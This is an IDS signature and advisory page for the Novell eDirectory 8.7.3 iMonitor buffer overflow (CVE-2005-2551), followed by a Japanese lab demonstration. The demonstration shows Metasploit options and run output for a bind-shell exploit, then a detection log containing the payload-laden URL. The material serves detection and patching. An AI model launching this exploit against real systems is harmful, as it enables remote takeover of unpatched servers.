Novell eDirectory iMonitor buffer overflow (HTTP_Novell_iMonitor_BO)
About this signature or vulnerability
Proventia G-Series, Proventia Desktop, Proventia Network IPS, RealSecure Server Sensor, RealSecure Network Sensor, Proventia M-Series, BlackICE Agent for Server, BlackICE PC Protection, BlackICE Server Protection, Proventia Server for Windows:
This signature detects an attempt to overflow Novell eDirectory Server iMonitor by sending a specially crafted URL
Default risk level
High
Sensors that have this signature
Proventia G-Series: XPU 24.38, Proventia Desktop: 8.0.812.1770, Proventia Network IPS: XPU 1.77, RealSecure Server Sensor: XPU 24.38, RealSecure Network Sensor: XPU 24.38, Proventia M-Series: XPU 1.77, BlackICE Agent for Server: 3.6epi, BlackICE PC Protection: 3.6cpi, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770
Systems affected
Windows NT: 4.0, Windows 2000: Any version, Novell eDirectory: 8.7.3, Windows 2003: Any version
Type
Unauthorized Access Attempt
Vulnerability description
Novell eDirectory is a software package that uses a Lightweight Directory Access Protocol (LDAP) directory service for integrating enterprise and eBusiness programs. Novell eDirectory version 8.7.3, when running on Microsoft Windows, is vulnerable to a buffer overflow caused by improper bounds checking in the iMonitor. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with SYSTEM level privileges or possibly cause dhost.ext to crash.
How to remove this vulnerability
Upgrade to the patch for this vulnerability, as listed in Novell Technical Information Document TID10098568. See References.
References
Secunia Security Advisory: SA16393
Novell eDirectory iMonitor Buffer Overflow Vulnerability
http://secunia.com/advisories/16393/
Novell Technical Information Document TID10098568
Buffer overflow vulnerability against eDirectory 8.7.3 imonitor on Windows
http://support.novell.com/cgi-bin/search/searchtid.cgi?/10098568.htm
Novell Technical Information Document TID2972038
eDirectory 8.7.3 iMonitor for Win32 - TID2972038
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972038.htm
CERT Vulnerability Note VU#213165
Novell eDirectory iMonitor vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/213165
ISS X-Force
Novell eDirectory iMonitor buffer overflow
http://www.iss.net/security_center/static/21794.php
CVE
CVE-2005-2551
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2551
■実証コード
===========================
Exploit: Name Default Description
-------- ------ --------------- -----------------------------------
optional SSL Use SSL
required RHOST 192.168.221.180 The target address
optional VHOST The virtual host name of the server
required RPORT 8008 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Windows (ALL) - eDirectory 8.7.3 iMonitor
msf edirectory_imonitor(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit Windows (ALL) - eDirectory 8.7.3 iMonitor
[*] Overflow request sent, sleeping for four seconds
[*] Exiting Bind Handler.
msf edirectory_imonitor(win32_bind) >
■検知
Date/Time | 2006-06-18 22:26:11 JST |
Tag Name | HTTP_Novell_iMonitor_BO |
Alert Name | HTTP_Novell_iMonitor_BO |
Severity | High |
Observance Type | Intrusion Detection |
Combined Event Count | 1 |
Cleared Flag | false |
Target IP Address | 192.168.37.180 |
Target Object Name | 8008 |
Target Object Type | Target Port |
Source IP Address | 192.168.221.11 |
SourcePort Name | 1633 |
Sensor IP Address | 10.4.6.100 |
Sensor Name | network_sensor_1 |
:accessed | yes |
:evasions | uses non-ASCII characters; |
:intruder-ip-addr | 192.168.221.11 |
:intruder-port | 1633 |
:server | 192.168.221.180:8008 |
:URL | /nds/佞7JBJ・A@GG@荘NJB屁C7J舛7FOFKKHJB傲・Fヨ@'@B櫑O廿GB澄FH'ヨHJI鋒FN桝廂G菅CB姆N妁訂僊O・@鎗@F・・GHON訪・泡OF滲GCO・・訂@C・蜂ヨGO・吏湧・ヨFNB7NF廿敦BK價鵰'ヨ趨K友僭7'@ヨ炉@O崇剞的BGB剞A・・CA只I'H'婁選'呂哲O銭・'O7N |
:victim-ip-addr | 192.168.37.180 |
:victim-port | 8008 |
algorithm-id | 2106212 |
IANAProtocolId | 6 |
Packet DestinationAddress | 192.168.37.180 |
Packet DestinationPort | 8008 |
Packet DestinationPortName | http-alt |
Packet SourceAddress | 192.168.221.11 |
Packet SourcePort | 1633 |